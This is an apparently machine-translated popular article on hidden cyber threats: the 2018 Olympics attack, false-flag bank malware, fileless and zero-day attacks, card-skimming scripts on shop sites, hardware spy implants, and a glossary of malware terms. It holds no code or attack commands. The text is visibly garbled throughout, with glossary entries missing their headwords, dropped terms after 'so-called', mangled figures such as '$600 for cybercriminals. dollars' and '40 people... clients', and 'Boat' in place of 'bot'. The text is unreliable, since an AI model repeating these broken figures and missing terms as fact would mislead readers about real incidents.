How did a certain Japanese minister surprise the hackers?
The number of methods of concealing, disguising and misleading the enemy - whether it be cybercrime or cyberwarfare - is growing inexorably. It can be said that today hackers very rarely, for the sake of fame or business, reveal what they have done.
A series of technical failures during last year's opening ceremony Winter Olympics in Korea, it was the result of a cyberattack. The Guardian reported that the unavailability of the Games website, Wi-Fi failure in the stadium and broken televisions in the press room were the result of a much more sophisticated attack than originally thought. The attackers gained access to the organizers' network in advance and disabled many computers in a very cunning way - despite numerous security measures.
Until its effects were seen, the enemy was invisible. Once the destruction was seen, it largely remained so (1). There were several theories about who was behind the attack. According to the most popular, the traces led to Russia - according to some commentators, this could be revenge for the removal of the state banners of Russia from the Games.
Other suspicions have been directed at North Korea, which is always looking to tease its southern neighbor, or China, which is a hacker power and is often among the suspects. But all this was more of a detective deduction than a conclusion based on irrefutable evidence. And in most of these cases, we are doomed only to this kind of speculation.
As a rule, establishing the authorship of a cyber attack is a difficult task. Not only do criminals usually leave no recognizable traces, but they also add confusing clues to their methods.
It was like this attack on Polish banks at the beginning of 2017. BAE Systems, which first described the high-profile attack on the Bangladesh National Bank, carefully examined some elements of the malware that targeted computers in Polish banks and concluded that its authors were trying to impersonate Russian-speaking people.
Elements of the code contained Russian words with strange transliteration - for example, the Russian word in the unusual form "client". BAE Systems suspects that the attackers used Google Translate to pretend to be Russian hackers using Russian vocabulary.
In May, the 2018 Banco de Chile acknowledged that he had problems and recommended that customers use online and mobile banking services, as well as ATMs. On the screens of computers located in the departments, experts found signs of damage to the boot sectors of disks.
After several days of browsing the net, traces were found confirming that massive disk corruption had indeed taken place on thousands of computers. According to unofficial information, the consequences affected 9 thousand people. computers and 500 servers.
Further investigation revealed that the virus had disappeared from the bank at the time of the attack. 11 millionand other sources point to an even larger sum! Security experts eventually concluded that the bank computer's damaged disks were simply camouflage for hackers to steal. However, the bank does not officially confirm this.
Zero days to prepare and zero files
Over the past year, almost two-thirds of the world's largest companies have been successfully attacked by cybercriminals. They most often used techniques based on zero-day vulnerabilities and the so-called. fileless attacks.
These are the findings of the State of Endpoint Security Risk report prepared by the Ponemon Institute on behalf of Barkly. Both attack techniques are varieties of the invisible enemy that are gaining more and more popularity.
According to the authors of the study, in the last year alone, the number of attacks against the world's largest organizations has increased by 20%. We also learn from the report that the average loss incurred as a result of such actions is estimated at $7,12 million each, which is $440 per position that was attacked. These amounts include both specific losses caused by criminals and the costs of restoring attacked systems to their original state.
Typical attacks are extremely difficult to counter, as they are usually based on vulnerabilities in software that neither the manufacturer nor the users are aware of. The former cannot prepare the appropriate security update, and the latter cannot implement the appropriate security procedures.
“As many as 76% of successful attacks were based on the exploitation of zero-day vulnerabilities or some previously unknown malware, which means that they were four times more effective than classic techniques previously used by cybercriminals,” the Ponemon Institute representatives explain. .
Second invisible method, fileless attacks, is to run malicious code on the system using various "tricks" (for example, by injecting an exploit into a website), without requiring the user to download or run any file.
Criminals are using this method more and more often as classic attacks to send malicious files (such as Office documents or PDF files) to users become less and less effective. In addition, attacks are usually based on software vulnerabilities that are already known and fixed - the problem is that many users do not update their applications often enough.
Unlike the scenario above, the malware does not place the executable on disk. Instead, it runs on your computer's internal memory, which is RAM.
This means that traditional antivirus software will have a hard time detecting a malicious infection because it won't find the file that points to it. Through the use of malware, an attacker can hide his presence on the computer without raising an alarm and cause various kinds of damage (theft of information, downloading additional malware, gaining access to higher privileges, etc.).
Fileless malware is also called (AVT). Some experts say it's even worse than (APT).
2. Information about the hacked site
When HTTPS Doesn't Help
It seems that the times when criminals took control of the site, changed the content of the main page, placing information on it in large print (2), are gone forever.
Currently, the goal of attacks is primarily to obtain money, and criminals use all methods to obtain tangible financial benefits in any situation. After the takeover, the parties try to remain hidden for as long as possible and make a profit or use the acquired infrastructure.
Injecting malicious code into poorly protected websites can have various purposes, such as financial (theft of credit card information). It was once written about Bulgarian scripts introduced on the website of the Office of the President of the Republic of Poland, but it was not possible to clearly state what the purpose of links to foreign fonts was.
A relatively new method is the so-called, that is, overlays that steal credit card numbers on store websites. The user of a website using HTTPS(3) is already trained and accustomed to checking if a given website is marked with this characteristic symbol, and the very presence of a padlock has become evidence that there are no threats.
3. Designation of HTTPS in the Internet address
However, criminals use this over-reliance on site security in different ways: they use free certificates, place a favicon in the form of a padlock on the site, and inject infected code into the source code of the site.
An analysis of the methods of infection of some online stores shows that the attackers transferred the physical skimmers of ATMs to the cyber world in the form of . When making a standard transfer for purchases, the client fills out a payment form in which he indicates all the data (credit card number, expiration date, CVV number, first and last name).
Payment is authorized by the store in the traditional way, and the entire purchase process is carried out correctly. However, in the case of use, a code (a single line of JavaScript is enough) is injected into the store site, which causes the data entered in the form to be sent to the server of the attackers.
One of the most famous crimes of this type was the attack on the website USA Republican Party Store. Within six months, the client's credit card details were stolen and transferred to a Russian server.
By evaluating store traffic and black market data, it was determined that the stolen credit cards generated a profit of $600 for cybercriminals. dollars.
In 2018, they were stolen in an identical way. smartphone maker OnePlus customer data. The company admitted that its server was infected, and the transferred credit card details were hidden right in the browser and sent to unknown criminals. It was reported that the data of 40 people were appropriated in this way. clients.
Equipment hazards
A huge and growing area of invisible cyber threats is made up of all kinds of techniques based on digital equipment, whether in the form of chips secretly installed in seemingly harmless components or spy devices.
On the discovery of additional, announced in October last year by Bloomberg, miniature spy chips in telecommunications equipment, incl. in Ethernet outlets (4) sold by Apple or Amazon became a sensation in 2018. The trail led to Supermicro, a device manufacturer in China. However, Bloomberg's information was subsequently refuted by all interested parties - from the Chinese to Apple and Amazon.
4. Ethernet network ports
As it turned out, also devoid of special implants, “ordinary” computer hardware can be used in a silent attack. For example, it has been found that a bug in Intel processors, which we recently wrote about in MT, which consists in the ability to "predict" subsequent operations, is able to allow any software (from a database engine to simple JavaScript to run in a browser) to access the structure or the contents of protected areas of kernel memory.
A few years ago, we wrote about equipment that allows you to secretly hack and spy on electronic devices. We described a 50-page "ANT Shopping Catalog" that was available online. As Spiegel writes, it is from him that intelligence agents specializing in cyber warfare choose their “weapons”.
The list includes products of various classes, from the sound wave and the $30 LOUDAUTO listening device to $40K. CANDYGRAM dollars, which are used to install your own copy of a GSM cell tower.
The list includes not only hardware, but also specialized software, such as DROPOUTJEEP, which, after being "implanted" in the iPhone, allows, among other things, to retrieve files from its memory or save files to it. Thus, you can receive mailing lists, SMS messages, voice messages, as well as control and locate the camera.
Faced with the power and omnipresence of invisible enemies, sometimes you feel helpless. That's why not everyone is surprised and amused attitude of Yoshitaka Sakurada, the minister in charge of preparations for the Tokyo 2020 Olympics and deputy head of the government's cybersecurity strategy office, who has reportedly never used a computer.
At least he was invisible to the enemy, not an enemy to him.
List of terms related to invisible cyber enemy
Malicious software designed to covertly log into a system, device, computer, or software, or by circumventing traditional security measures.
Boat – a separate device connected to the Internet, infected with malware and included in a network of similar infected devices. this is most often a computer, but it can also be a smartphone, tablet, or IoT-connected equipment (such as a router or refrigerator). It receives operational instructions from the command and control server or directly, and sometimes from other users on the network, but always without the knowledge or knowledge of the owner. they can include up to a million devices and send up to 60 billion spam per day. They are used for fraudulent purposes, receiving online surveys, manipulating social networks, as well as for spreading spam and.
– in 2017, a new technology for mining Monero cryptocurrency in web browsers appeared. The script was created in JavaScript and can be easily embedded into any page. When the user
a computer visits such an infected page, the computing power of its device is used for cryptocurrency mining. The more time we spend on these types of websites, the more CPU cycles in our equipment can be used by a cybercriminal.
– Malicious software that installs another type of malware, such as a virus or backdoor. often designed to avoid detection by traditional solutions
antivirus, incl. due to delayed activation.
Malware that exploits a vulnerability in legitimate software to compromise a computer or system.
– using software to collect information related to a particular type of keyboard usage, such as the sequence of alphanumeric/special characters associated with particular words
keywords such as "bankofamerica.com" or "paypal.com". If it runs on thousands of connected computers, a cybercriminal has the ability to collect sensitive information quickly.
– Malicious software specifically designed to harm a computer, system, or data. It includes several types of tools, including Trojans, viruses, and worms.
– an attempt to obtain sensitive or confidential information from a user of equipment connected to the Internet. Cybercriminals use this method to distribute electronic content to a wide range of victims, prompting them to take certain actions, such as clicking on a link or replying to an email. In this case, they will provide personal information such as username, password, bank or financial details or credit card details without their knowledge. Distribution methods include email, online advertising and SMS. A variant is an attack directed at specific individuals or groups of individuals, such as corporate executives, celebrities, or high-ranking government officials.
– Malicious software that allows you to secretly gain access to parts of a computer, software or system. It often modifies the hardware operating system in such a way that it remains hidden from the user.
- malware that spying on a computer user, intercepting keystrokes, emails, documents, and even turning on a video camera without his knowledge.
- a method of hiding a file, message, image or movie in another file. Take advantage of this technology by uploading seemingly harmless image files containing complex streams.
messages sent over the C&C channel (between a computer and a server) suitable for illegal use. Images may be stored on a hacked website or even
in image sharing services.
Encryption/complex protocols is a method used in code to obfuscate transmissions. Some malware-based programs, such as the Trojan, encrypt both malware distribution and C&C (control) communications.
is a form of non-replicating malware that contains hidden functionality. The Trojan usually does not try to spread or inject itself into other files.
- a combination of the words ("voice") and. Means using a telephone connection to obtain sensitive personal information such as bank or credit card numbers.
Typically, the victim receives an automated message challenge from someone who claims to represent a financial institution, ISP, or technology company. The message may ask for an account number or a PIN. Once the connection is activated, it is redirected through the service to the attacker, who then requests additional sensitive personal data.
(BEC) - a type of attack aimed at deceiving people from a given company or organization and stealing money by impersonating
governed by. Criminals gain access to a corporate system through a typical attack or malware. They then study the company's organizational structure, its financial systems, and management's email style and schedule.
See also:
